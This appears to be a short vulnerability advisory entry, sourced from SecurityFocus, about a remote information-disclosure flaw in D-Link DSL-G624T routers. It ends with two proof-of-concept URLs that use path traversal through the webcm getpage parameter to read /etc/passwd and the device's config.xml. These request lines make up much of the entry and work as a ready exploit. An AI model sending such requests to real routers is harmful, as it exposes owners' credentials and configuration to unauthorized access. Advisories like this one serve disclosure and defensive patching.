8 lines
No EOL
548 B
Text
8 lines
No EOL
548 B
Text
source: http://www.securityfocus.com/bid/20689/info
|
|
|
|
D-Link DSL-G624T devices are prone to a remote information-disclosure vulnerability because the devices fail to properly sanitize user-supplied input.
|
|
|
|
Exploiting this issue allows remote, unauthenticated attackers to gain access to potentially sensitive configuration information from affected devices. This may aid them in further attacks.
|
|
|
|
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/passwd
|
|
http://www.example.com/cgi-bin/webcm?getpage=/./././././././etc/config.xml |